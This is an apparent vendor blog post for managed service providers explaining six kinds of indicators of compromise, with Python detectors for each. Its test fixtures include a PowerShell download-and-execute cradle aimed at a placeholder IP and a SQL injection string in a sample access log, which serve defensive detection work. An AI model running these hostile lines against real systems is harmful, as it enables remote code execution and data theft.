8 Apr 2024

To effectively protect their clients from escalating cyber threats, MSPs need a deep understanding of tactical threat intelligence. Enter indicators of compromise (IOCs). 

IOCs are critical pieces of information that help MSPs identify whether a system or network has been infiltrated by malicious actors. Using these digital breadcrumbs, MSPs can uncover cyberattacks. This article will explore what IOCs are and which indicators MSPs should watch out for.

What Is an IOC?

An indicator of compromise (IOC) is a piece of forensic evidence, such as a file hash, an IP address or domain name, a user-agent string or a registry key, showing that a system or network has been breached or is being attacked. Matching this evidence against logs and telemetry is what raises security alerts about suspicious activity or a potential threat.

Monitoring for IOCs is akin to having a vigilant digital security guard. When these indicators are spotted, IT security professionals can limit the damage by containing the attack before the attacker reaches their objective.

Common indicators of compromise examples

The six common types of IOCs in cybersecurity that MSPs should detect and investigate are:

1. Malware Signatures

Malware leaves recognisable traces in files and code: cryptographic hashes of known malicious files, byte or string patterns (YARA-style rules), and characteristic behaviours such as a script that downloads a payload and executes it in memory.

By checking files against these signatures, MSPs can quickly identify an infected client system and isolate and remove the malware before it causes substantial damage. A hash matches only an exact copy of a file, so a repacked or slightly modified sample slips past it; pattern and behaviour rules are needed to catch variants.
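
The difference between a hash signature and a pattern rule is easiest to see in code. The following Python is an added example written for this article, not SaaS Alerts' code: the "known bad" hash, the PowerShell download-cradle rule and the sample files are all constructed here, and the rule names are hypothetical.

```python
from __future__ import annotations

import hashlib
import re

# Constructed indicators for this example: the "known bad" hash is the SHA-256 of a
# made-up byte string, not a real malware sample.
_DROPPER_BYTES = b"MZ\x90\x00example-dropper-v1"
KNOWN_BAD_SHA256 = {
    hashlib.sha256(_DROPPER_BYTES).hexdigest(): "Dropper.Example",
}

# Content/behaviour rules in the spirit of YARA strings: here a PowerShell download
# cradle (fetch a script and run it in memory). Hypothetical rule name.
PATTERN_RULES = [
    ("PS_DownloadCradle",
     re.compile(rb"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\.DownloadString", re.IGNORECASE)),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_bytes(name: str, data: bytes) -> list[dict]:
    """Run both detection styles over one file's contents."""
    hits = []
    digest = sha256_hex(data)
    if digest in KNOWN_BAD_SHA256:
        hits.append({"file": name, "rule": KNOWN_BAD_SHA256[digest], "type": "hash"})
    for rule_name, rx in PATTERN_RULES:
        if rx.search(data):
            hits.append({"file": name, "rule": rule_name, "type": "pattern"})
    return hits


def scan_samples(samples: dict[str, bytes]) -> dict[str, list[str]]:
    """Return {filename: [matched rule names]} for files that matched anything."""
    results: dict[str, list[str]] = {}
    for name, data in samples.items():
        hits = scan_bytes(name, data)
        if hits:
            results[name] = [h["rule"] for h in hits]
    return results


# Constructed sample set. The repacked dropper differs from the original by one byte,
# enough to defeat the hash; the obfuscated script only changes letter case and spacing.
SAMPLES = {
    "dropper.exe": _DROPPER_BYTES,
    "dropper_repacked.exe": _DROPPER_BYTES + b"\x00",
    "update.ps1": b"$u='http://198.51.100.7/x'; IEX (New-Object Net.WebClient).DownloadString($u)",
    "update_obf.ps1": b"$u='http://198.51.100.7/x'; iex ( new-object net.webclient ).downloadstring($u)",
    "readme.txt": b"Quarterly report, nothing to see here.",
}

if __name__ == "__main__":
    for filename, rules in scan_samples(SAMPLES).items():
        print(f"{filename}: {', '.join(rules)}")
```

Running it reports dropper.exe (hash), update.ps1 and update_obf.ps1 (pattern), but not dropper_repacked.exe: a single appended byte changes the SHA-256, while the case-insensitive pattern still matches the obfuscated script. Hashes remain worth sharing as IOCs because they are cheap and exact; they just need pattern or behaviour rules alongside them.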

2. Suspicious Network Traffic

Any unusual data flow or communication on a network can indicate a potential security threat. Suspicious traffic includes port scanning, unusual DNS requests (for example many long, random-looking subdomains queried under a single domain), regular beaconing to an unknown external host, or sudden spikes in outbound data.

MSPs should monitor these anomalies to promptly respond to suspicious inbound and outbound network traffic and prevent unauthorised access or data exfiltration.
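
As an added example (not from the article or SaaS Alerts), the following Python applies the DNS heuristics above to a constructed resolver log: it groups queries by client and parent domain and flags pairs with many unique, long or high-entropy leftmost labels, the shape DNS tunnelling takes. The log lines, addresses, domain names and thresholds are all assumptions made for the illustration.

```python
from __future__ import annotations

import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character. Dictionary words sit around 2-3; random hex approaches 4."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parent_domain(qname: str) -> str:
    # Simplification: treat the last two labels as the registrable domain.
    # A public-suffix list is needed for names like example.co.uk.
    return ".".join(qname.split(".")[-2:])


def analyse_dns(log: str, min_unique: int = 5, min_len: float = 20.0,
                min_entropy: float = 3.0) -> dict:
    """Group queries by (client, parent domain) and flag pairs with many unique,
    long or high-entropy leftmost labels."""
    subdomains: dict[tuple[str, str], set[str]] = defaultdict(set)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the whole run
        _ts, client, _qtype, qname = parts
        qname = qname.lower().rstrip(".")
        parent = parent_domain(qname)
        if qname != parent:
            subdomains[(client, parent)].add(qname)

    stats, flagged = {}, []
    for key, names in subdomains.items():
        first_labels = [n.split(".")[0] for n in names]
        avg_len = sum(map(len, first_labels)) / len(first_labels)
        avg_entropy = sum(map(shannon_entropy, first_labels)) / len(first_labels)
        stats[key] = {"unique": len(names), "avg_len": avg_len, "avg_entropy": avg_entropy}
        if len(names) >= min_unique and (avg_len >= min_len or avg_entropy >= min_entropy):
            flagged.append(key)
    return {"stats": stats, "flagged": sorted(flagged)}


# Constructed resolver log, "<timestamp> <client> <qtype> <qname>"; not real traffic.
_BENIGN = [
    "2024-04-08T10:00:01 10.0.0.12 A www.example.com",
    "2024-04-08T10:00:02 10.0.0.12 A mail.example.com",
    "2024-04-08T10:00:03 10.0.0.12 A www.example.com",
    "2024-04-08T10:00:04 10.0.0.31 A www.example.com",
]


def _fake_chunk_label(i: int) -> str:
    # Stand-in for an encoded data chunk: 32 hex characters derived from a counter.
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:32]


_TUNNEL = [
    f"2024-04-08T10:00:{5 + i:02d} 10.0.0.31 TXT {_fake_chunk_label(i)}.d.exfil-test.net"
    for i in range(8)
]
DNS_LOG = "\n".join(_BENIGN + _TUNNEL)

if __name__ == "__main__":
    result = analyse_dns(DNS_LOG)
    for client, parent in result["flagged"]:
        s = result["stats"][(client, parent)]
        print(f"{client} -> {parent}: {s['unique']} unique names, "
              f"avg label length {s['avg_len']:.0f}, avg entropy {s['avg_entropy']:.2f}")
```

Only the (10.0.0.31, exfil-test.net) pair is flagged; the same client's ordinary lookup of www.example.com is not. Thresholds need tuning per environment, since CDNs and some telemetry services legitimately generate many unique subdomains, which is why the rule combines volume with label shape instead of relying on either alone.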

3. Unusual User Account Activity

Anomalies in user accounts might include repeated failed login attempts, unauthorised access to sensitive files, or sudden changes in user privileges.

If an account is compromised or shows signs of malicious activity, MSPs can take immediate action to isolate it. These actions typically involve revoking the account's active sessions and tokens, resetting its password, and disabling the account until the investigation is complete.
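
The account anomalies above can be turned into rules over an authentication log. The Python below is an added example written for this article (not SaaS Alerts' code) that runs three detections over a constructed log: a burst of failures against one account, a success immediately after such a burst, and a password spray where one source fails once against many accounts. The log lines, window and thresholds are assumptions.

```python
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log, "<timestamp> <user> <source-ip> <FAIL|SUCCESS>".
# Covers: a brute-force burst that ends in a success, an ordinary user typo, and a
# password spray (one source, one failure each against many accounts).
AUTH_LOG = """\
2024-04-08T09:00:01 alice 203.0.113.9 FAIL
2024-04-08T09:00:04 alice 203.0.113.9 FAIL
2024-04-08T09:00:07 alice 203.0.113.9 FAIL
2024-04-08T09:00:10 alice 203.0.113.9 FAIL
2024-04-08T09:00:13 alice 203.0.113.9 FAIL
2024-04-08T09:00:40 alice 203.0.113.9 SUCCESS
2024-04-08T09:05:00 bob 10.0.0.5 FAIL
2024-04-08T09:05:30 bob 10.0.0.5 SUCCESS
2024-04-08T09:10:00 carol 198.51.100.2 FAIL
2024-04-08T09:10:01 dave 198.51.100.2 FAIL
2024-04-08T09:10:02 erin 198.51.100.2 FAIL
2024-04-08T09:10:03 frank 198.51.100.2 FAIL
2024-04-08T09:10:04 grace 198.51.100.2 FAIL
2024-04-08T09:10:05 heidi 198.51.100.2 FAIL
"""


def parse_auth_log(log: str) -> list[tuple[datetime, str, str, str]]:
    events = []
    for line in log.splitlines():
        ts, user, ip, result = line.split()
        events.append((datetime.fromisoformat(ts), user, ip, result))
    events.sort()  # the detections below assume chronological order
    return events


def detect_auth_anomalies(log: str, window: timedelta = timedelta(minutes=5),
                          fail_threshold: int = 5, spray_users: int = 5) -> list[dict]:
    alerts: list[dict] = []
    fails_by_user: dict[str, deque] = defaultdict(deque)            # user -> recent failure times
    users_by_ip: dict[str, dict[str, datetime]] = defaultdict(dict)  # ip -> {user: last failure}
    burst_reported, spray_reported = set(), set()

    for ts, user, ip, result in parse_auth_log(log):
        if result == "FAIL":
            q = fails_by_user[user]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures that left the sliding window
                q.popleft()
            if len(q) >= fail_threshold and user not in burst_reported:
                alerts.append({"type": "brute_force", "user": user, "ip": ip, "at": ts})
                burst_reported.add(user)

            recent = users_by_ip[ip]
            recent[user] = ts
            for stale in [u for u, t in recent.items() if ts - t > window]:
                del recent[stale]
            if len(recent) >= spray_users and ip not in spray_reported:
                alerts.append({"type": "password_spray", "ip": ip,
                               "users": sorted(recent), "at": ts})
                spray_reported.add(ip)

        elif result == "SUCCESS":
            # A success right after a burst of failures is the highest-value signal:
            # the guessing most likely worked, so this account needs containment now.
            recent_fails = [t for t in fails_by_user[user] if ts - t <= window]
            if len(recent_fails) >= fail_threshold:
                alerts.append({"type": "success_after_burst", "user": user, "ip": ip, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_auth_anomalies(AUTH_LOG):
        print(alert)
```

Bob's single typo produces nothing, while alice's burst produces two alerts, the second of which (success_after_burst) is the one to act on first. The spray detector keys on the source address rather than the account, because each account sees only one failure and a per-account lockout threshold would never fire.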

4. Unexpected Geographical Anomalies

If a user account or a device logs in from an unusual location, it can suggest unauthorised access or a compromised account. Attackers often use VPNs or proxies to hide their actual geographic location, so a single unfamiliar location is weak evidence on its own. A far stronger signal is "impossible travel": two sign-ins from places too far apart to travel between in the time that elapsed.

For example, if a user usually logs in from New York and a login from Japan follows twenty minutes later, that is a geographical anomaly worth investigating. In certain situations, however, such as vacations or business trips, the user may legitimately log in from a different location. By considering this context, MSPs can make more informed decisions about whether a geographical anomaly indicates a security threat or simply reflects the user's legitimate activities.
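
One way to turn the geographical check above into a rule is to compare consecutive sign-ins by the same user and flag pairs whose great-circle distance could not have been covered in the time between them. The Python below is an added example, not part of the article or of SaaS Alerts: the sign-in records are constructed (the coordinates are the usual city-centre values), and the 900 km/h ceiling (roughly airliner speed), the 100 km minimum hop and the known_travel allow-list for confirmed trips are assumptions.

```python
from __future__ import annotations

import math
from collections import defaultdict
from datetime import datetime

# Constructed sign-in records: (user, timestamp, geo-IP city, latitude, longitude).
SIGNINS = [
    ("alice", "2024-04-08T09:00:00", "New York", 40.7128, -74.0060),
    ("alice", "2024-04-08T09:20:00", "Tokyo", 35.6762, 139.6503),
    ("bob", "2024-04-08T08:00:00", "London", 51.5074, -0.1278),
    ("bob", "2024-04-08T18:30:00", "New York", 40.7128, -74.0060),
]


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, using Earth's mean radius."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def impossible_travel(signins, max_kmh: float = 900.0, min_km: float = 100.0,
                      known_travel: frozenset = frozenset()) -> list[dict]:
    """Flag consecutive sign-ins by one user whose implied speed exceeds max_kmh.
    known_travel holds (user, city) pairs the MSP has confirmed as legitimate trips."""
    by_user = defaultdict(list)
    for user, ts, city, lat, lon in signins:
        by_user[user].append((datetime.fromisoformat(ts), city, lat, lon))

    alerts = []
    for user, events in by_user.items():
        events.sort()
        for (t1, c1, la1, lo1), (t2, c2, la2, lo2) in zip(events, events[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            if km < min_km:
                continue  # geo-IP jitter inside one metro area is not travel
            hours = (t2 - t1).total_seconds() / 3600
            speed = km / hours if hours > 0 else math.inf
            if speed > max_kmh and (user, c2) not in known_travel:
                alerts.append({"user": user, "from": c1, "to": c2, "km": round(km),
                               "kmh": speed if speed == math.inf else round(speed)})
    return alerts


if __name__ == "__main__":
    for a in impossible_travel(SIGNINS):
        print(f"{a['user']}: {a['from']} -> {a['to']}, {a['km']} km at {a['kmh']} km/h")
```

Alice's New York to Tokyo hop (about 10,850 km in twenty minutes) is flagged; Bob's London to New York sign-ins ten and a half hours apart are not. Geo-IP is coarse, and VPN exits or mobile carrier gateways can place a user hundreds of kilometres from where they sit, which is why the rule ignores short hops and why the allow-list exists; treat a hit as a prompt to verify with the user and inspect the session, not as proof.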

5. Suspicious Registry Changes

On Windows, the Registry is a hierarchical database in which the operating system and installed applications store their configuration settings. macOS has no registry; system and application settings live in property-list files and configuration directories, and the same baseline-and-diff approach applies to those.

When malware infects a Windows system, it often modifies the registry to persist and to alter system settings, for example by adding an entry to one of the Run keys so that it starts at logon, or by changing Winlogon values. MSPs can identify these alterations by comparing the current autostart entries with a known-good baseline and take action to remove the threat.
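
Checking for suspicious registry changes in practice usually means comparing a current export of the autostart locations with a known-good baseline. The Python below is an added example written for this article (not SaaS Alerts' code): it parses the text format produced by `reg export` and regedit and diffs two constructed exports whose key paths, value names and file paths are illustrative only.

```python
from __future__ import annotations

import re

# Constructed .reg exports (baseline vs. current) of common autostart locations.
BASELINE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Blob"=hex:01,02,03,\
  04,05
'''

CURRENT_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Roaming\\svchosts.exe -k"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Blob"=hex:01,02,03,\
  04,05

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,C:\\ProgramData\\helper.exe"
'''

# "name"=value or @=value (default value). Names may contain escaped quotes.
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def _unescape(s: str) -> str:
    # .reg strings escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def _decode_value(raw: str) -> str:
    raw = raw.strip()
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])   # REG_SZ
    return raw                         # dword:..., hex:..., hex(2):... kept as raw tokens


def parse_reg(text: str) -> dict[str, dict[str, str]]:
    """Parse a .reg export into {key_path: {value_name: value}}; "@" is the default value.
    Joins multi-line hex continuations (lines ending in a backslash) and skips
    comments (;) and key-deletion markers ([-HKEY...])."""
    keys: dict[str, dict[str, str]] = {}
    current = None
    pending = ""
    for raw_line in text.splitlines():
        line = pending + raw_line.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            current = None if name.startswith("-") else name
            if current is not None:
                keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            vname = "@" if m.group(2) else _unescape(m.group(1))
            keys[current][vname] = _decode_value(m.group(3))
    return keys


def diff_autoruns(baseline: dict, current: dict) -> list[dict]:
    """Report values added, removed or modified relative to the baseline export."""
    findings = []
    for key in sorted(set(baseline) | set(current)):
        b, c = baseline.get(key, {}), current.get(key, {})
        for name in sorted(set(b) | set(c)):
            if name not in b:
                findings.append({"change": "added", "key": key, "name": name, "value": c[name]})
            elif name not in c:
                findings.append({"change": "removed", "key": key, "name": name, "value": b[name]})
            elif b[name] != c[name]:
                findings.append({"change": "modified", "key": key, "name": name,
                                 "value": c[name], "was": b[name]})
    return findings


if __name__ == "__main__":
    for f in diff_autoruns(parse_reg(BASELINE_REG), parse_reg(CURRENT_REG)):
        print(f"{f['change']:8} {f['key']}\\{f['name']} = {f['value']}")
```

The diff surfaces the new "Updater" Run entry and the new Winlogon "Shell" value. Run keys are only one persistence location; services, scheduled tasks, Winlogon Shell/Userinit and Explorer shell-extension keys all belong in the baseline. An executable in a user-writable directory such as AppData\Roaming, or a name that imitates a system binary (svchosts.exe here), deserves immediate attention.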

6. HTML Response Sizes

HTML response sizes refer to the volume of data a web server sends to a client's browser in response to an HTTP request. These responses include the HTML content, images, stylesheets, scripts, and other elements of a web page, and for a given page they are usually fairly consistent in size.

When attackers compromise a web application, for example through an injection flaw or a planted web shell, they frequently pull data out through the same HTTP channel, so the server's responses to the attacker's requests become far larger than that page normally is. Monitoring response sizes per endpoint against a baseline can reveal this unauthorised data transfer.
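
To show what monitoring response sizes looks like in practice, the following Python is an added example (not from the article or SaaS Alerts) that reads constructed access-log lines, builds a per-endpoint baseline from the median and median absolute deviation (MAD) of successful response sizes, and flags responses far outside it. The log lines, paths and thresholds are constructed for the illustration.

```python
from __future__ import annotations

import re
from collections import defaultdict
from statistics import median

# Constructed access log in common log format: ten ordinary /products responses,
# two static-asset fetches, one redirect without a body, and one oversized response.
ACCESS_LOG = """\
203.0.113.5 - - [08/Apr/2024:10:00:01 +0000] "GET /products?id=42 HTTP/1.1" 200 8120
203.0.113.5 - - [08/Apr/2024:10:00:03 +0000] "GET /static/app.js HTTP/1.1" 200 51200
203.0.113.8 - - [08/Apr/2024:10:00:05 +0000] "GET /products?id=17 HTTP/1.1" 200 8090
203.0.113.8 - - [08/Apr/2024:10:00:06 +0000] "GET /static/app.js HTTP/1.1" 200 51200
198.51.100.4 - - [08/Apr/2024:10:00:09 +0000] "GET /products?id=3 HTTP/1.1" 200 8150
198.51.100.4 - - [08/Apr/2024:10:00:12 +0000] "POST /login HTTP/1.1" 302 -
203.0.113.5 - - [08/Apr/2024:10:00:15 +0000] "GET /products?id=58 HTTP/1.1" 200 8210
203.0.113.9 - - [08/Apr/2024:10:00:17 +0000] "GET /products?id=9 HTTP/1.1" 200 8130
203.0.113.9 - - [08/Apr/2024:10:00:18 +0000] "GET /products?id=10 HTTP/1.1" 200 8100
203.0.113.9 - - [08/Apr/2024:10:00:19 +0000] "GET /products?id=11 HTTP/1.1" 200 8175
203.0.113.5 - - [08/Apr/2024:10:00:21 +0000] "GET /products?id=12 HTTP/1.1" 200 8095
203.0.113.8 - - [08/Apr/2024:10:00:22 +0000] "GET /products?id=13 HTTP/1.1" 200 8160
203.0.113.8 - - [08/Apr/2024:10:00:23 +0000] "GET /products?id=14 HTTP/1.1" 200 8140
192.0.2.77 - - [08/Apr/2024:10:00:30 +0000] "GET /products?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 412000
"""

_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def parse_access_log(log: str) -> list[dict]:
    rows = []
    for line in log.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, size = m.groups()
        rows.append({"ip": ip, "ts": ts, "method": method, "target": target,
                     "path": target.split("?", 1)[0],   # baseline per route, not per query string
                     "status": int(status), "size": 0 if size == "-" else int(size)})
    return rows


def find_oversized_responses(log: str, z_threshold: float = 6.0,
                             ratio_threshold: float = 3.0) -> list[dict]:
    """Per (method, path), build a robust baseline (median and MAD) of successful
    response sizes and flag responses that are both far outside it and several times
    the typical size. Median/MAD are used so the outlier does not inflate its own baseline."""
    by_endpoint: dict[tuple[str, str], list[dict]] = defaultdict(list)
    for r in parse_access_log(log):
        if r["status"] == 200:
            by_endpoint[(r["method"], r["path"])].append(r)

    alerts = []
    for group in by_endpoint.values():
        sizes = [r["size"] for r in group]
        med = median(sizes)
        mad = median(abs(s - med) for s in sizes) or max(med * 0.01, 1.0)  # floor for constant sizes
        scale = 1.4826 * mad   # MAD scaled to be comparable with a standard deviation
        for r in group:
            z = (r["size"] - med) / scale
            if z > z_threshold and r["size"] > ratio_threshold * med:
                alerts.append({**r, "median": med, "robust_z": round(z, 1)})
    return alerts


if __name__ == "__main__":
    for a in find_oversized_responses(ACCESS_LOG):
        print(f"{a['ip']} {a['method']} {a['target']}: {a['size']} bytes "
              f"(median {a['median']}, robust z {a['robust_z']})")
```

The single 412,000-byte response to /products stands out against a median of 8,140 bytes, and the request that produced it is the obvious next thing to look at. Static assets with constant sizes get a floored MAD so they never trigger, and non-200 responses are excluded from the baseline. Pairing this check with rules on request patterns and on outbound byte counts per host covers cases where the attacker splits the data over many normal-sized responses.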

Why MSPs Should Monitor for Indicators of Compromise

Monitoring for indicators of compromise is essential for these six reasons:

1) Proactive defense: IOC monitoring lets MSPs detect signs of compromise early and contain them before the attacker reaches their objective, rather than reacting only once a breach has run its course.

2) Client data protection: MSPs are responsible for safeguarding their clients' sensitive information. Monitoring IOCs helps ensure the confidentiality and integrity of this data, preventing unauthorised access, exfiltration, or tampering.

3) Ransomware protection: Cybercriminals have become 94% quicker in executing ransomware attacks, from 60+ days in 2019 to just 3.85 days in 2021, per IBM. Against attacks this fast, ransomware indicators of compromise play a vital role in response and mitigation efforts. They help security teams isolate compromised systems, remove ransomware, and recover encrypted data from backups.

4) Cost reduction: Dealing with security incidents after they occur is expensive and time-consuming. A report by Osterman found that organisations pay $1,197 per employee yearly to address cyber incidents across email services, cloud collaboration apps or services, and web browsers. By preventing or detecting incidents early, MSPs reduce the costs associated with incident response and recovery.

5) Client education: MSPs can use insights from IOC monitoring to educate clients about emerging threats and best practices for security. This knowledge-sharing strengthens the client-MSP relationship and empowers clients to become more vigilant about their security.

6) Enhanced incident response: A well-established IOC monitoring process significantly improves the speed and effectiveness of incident response, reducing downtime and potential damage.

How to identify indicators of compromise

Identifying IOCs through threat intelligence is a valuable way to enhance cybersecurity. Effective threat intelligence involves gathering and analysing data about potential threats and vulnerabilities.

Here’s how users can effectively identify IOCs:

Collect and Analyse Data

Start by collecting data from various sources, such as open-source threat feeds, commercial threat intelligence providers, government agencies, internal logs, and community forums related to cybersecurity.

Aggregate and consolidate the collected data into a central repository or threat intelligence platform, which should be capable of analysing the data to identify patterns and potential IOCs. Users can use automated tools and algorithms to sift through large datasets.

Look for IOCs

Pay attention to unusual or abnormal patterns in the data, such as:

  • IP addresses
  • Geolocation
  • File activity
  • External email addresses
  • Devices used to sign in to accounts
  • Policy changes

Correlate and Contextualise

Prioritise the identified IOCs based on relevance and severity. Not all IOCs are equally important; some may generate false positives, leading to alert fatigue. Users should also correlate different IOCs to understand a more comprehensive picture of potential threats and attacks.

By contextualising the IOCs, the team can assess the threat actor's tactics, techniques, and procedures (TTPs) and the potential impact on the organisation.

Customise Alerts and Rules

Set up alerts and rules within the security stack, such as intrusion detection systems (IDS), SIEM correlation rules, or the alerting features of SaaS monitoring tools, to automatically trigger responses when specific IOCs are detected.

These systems can be configured to block traffic to or from a flagged address, isolate a compromised host, or suspend an account upon finding relevant IOCs. Automated actions should be reserved for high-confidence indicators so that a false positive does not take a client offline.

Respond to Threats

When relevant IOCs are detected, initiate the incident response plan to mitigate the threat. This plan should include:

  • Isolating compromised systems and accounts
  • Removing malware
  • Patching vulnerabilities
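
The steps above, from ingesting a feed to deciding on a response, fit in one small pipeline. The Python below is an added example written for this article (not SaaS Alerts' code): it indexes a constructed IOC feed, matches normalised network, DNS and file events against it (domains match by suffix so subdomains are caught), scores each host by severity and by how many different IOC types hit, and maps the result to a response action. The feed, events, weights and action thresholds are all assumptions.

```python
from __future__ import annotations

from collections import defaultdict

SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 5, "critical": 8}

# Constructed threat feed. The hash is a placeholder value, not a real sample.
IOC_FEED = [
    {"type": "ip", "value": "198.51.100.7", "severity": "high", "tags": ["c2"]},
    {"type": "domain", "value": "exfil-test.net", "severity": "high", "tags": ["exfil"]},
    {"type": "sha256", "severity": "critical", "tags": ["dropper"],
     "value": "9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08"},
    {"type": "ip", "value": "192.0.2.10", "severity": "low", "tags": ["scanner"]},
]

# Constructed, already-normalised events from different log sources.
EVENTS = [
    {"host": "WS-014", "kind": "netflow", "dst_ip": "198.51.100.7", "bytes_out": 48_000_000},
    {"host": "WS-014", "kind": "dns", "qname": "a8f3.d.exfil-test.net"},
    {"host": "WS-014", "kind": "file",
     "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"},
    {"host": "SRV-02", "kind": "netflow", "dst_ip": "192.0.2.10", "bytes_out": 1200},
    {"host": "WS-021", "kind": "dns", "qname": "www.example.com"},
]


def index_feed(feed: list[dict]) -> dict[str, dict[str, dict]]:
    """type -> lower-cased value -> IOC record, for O(1) lookups."""
    idx: dict[str, dict[str, dict]] = defaultdict(dict)
    for ioc in feed:
        idx[ioc["type"]][ioc["value"].lower()] = ioc
    return idx


def match_event(event: dict, idx: dict) -> dict | None:
    """Return the IOC an event matches, or None. Domains match on any suffix so a
    listed parent domain also catches its subdomains."""
    if "dst_ip" in event and event["dst_ip"] in idx["ip"]:
        return idx["ip"][event["dst_ip"]]
    if "sha256" in event and event["sha256"].lower() in idx["sha256"]:
        return idx["sha256"][event["sha256"].lower()]
    if "qname" in event:
        labels = event["qname"].lower().rstrip(".").split(".")
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate in idx["domain"]:
                return idx["domain"][candidate]
    return None


def triage(events: list[dict], feed: list[dict]) -> list[dict]:
    """Correlate matches per host and rank: several different IOC types on one host
    is far stronger evidence than one indicator firing repeatedly."""
    idx = index_feed(feed)
    per_host = defaultdict(lambda: {"score": 0, "types": set(), "matches": []})
    for ev in events:
        ioc = match_event(ev, idx)
        if ioc is None:
            continue
        h = per_host[ev["host"]]
        h["score"] += SEVERITY_WEIGHT[ioc["severity"]]
        h["types"].add(ioc["type"])
        h["matches"].append(f'{ioc["type"]}:{ioc["value"]}')

    report = []
    for host, h in per_host.items():
        if len(h["types"]) >= 2:
            action = "isolate_host"          # corroborated: contain first, investigate after
        elif h["score"] >= SEVERITY_WEIGHT["high"]:
            action = "investigate"
        else:
            action = "log_only"              # e.g. a known internet scanner touching a server
        report.append({"host": host, "score": h["score"], "distinct_types": len(h["types"]),
                       "matches": h["matches"], "action": action})
    report.sort(key=lambda r: (r["distinct_types"], r["score"]), reverse=True)
    return report


if __name__ == "__main__":
    for row in triage(EVENTS, IOC_FEED):
        print(row)
```

WS-014 hits three indicator types (C2 address, exfiltration domain, dropper hash) and is ranked first with an isolate action; SRV-02 matched only a low-severity scanner address and is logged; WS-021 does not appear at all. Case-normalising hashes and domain names before lookup matters in practice, because feeds and log sources disagree on casing.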

Share Threat Data and Feedback

Share IOCs and threat intelligence with other organisations and industry-specific Information Sharing and Analysis Centers (ISACs). Collaborative sharing of threat data allows organisations to cross-reference and validate information about security events, improving the accuracy and reliability of threat intelligence.

Teams should continually use the lessons from security incidents to improve their security posture, adjusting policies, procedures, and defenses based on the insights gained from IOCs.

Detect IOCs efficiently with SaaS Alerts

The automation capabilities of SaaS Alerts help MSPs streamline IOC detection efforts, proactively safeguard digital assets, and respond swiftly to potential threats.

Having an automated process to collect data and respond to IOCs enables faster remediation. With the platform, MSPs can leverage the following features:

  • Continuous monitoring: Get rapid notifications of unusual activities within a client's network or systems.
  • Threat intelligence integration: Stay informed about the latest threats and vulnerabilities, so MSPs are well-prepared to face evolving challenges.
  • Automated response: Set up automatic responses to mitigate threats, reduce response time, and minimise potential damage.
  • Comprehensive reporting: Monitor a wide range of IOCs, including application traffic, user activity, and file metadata.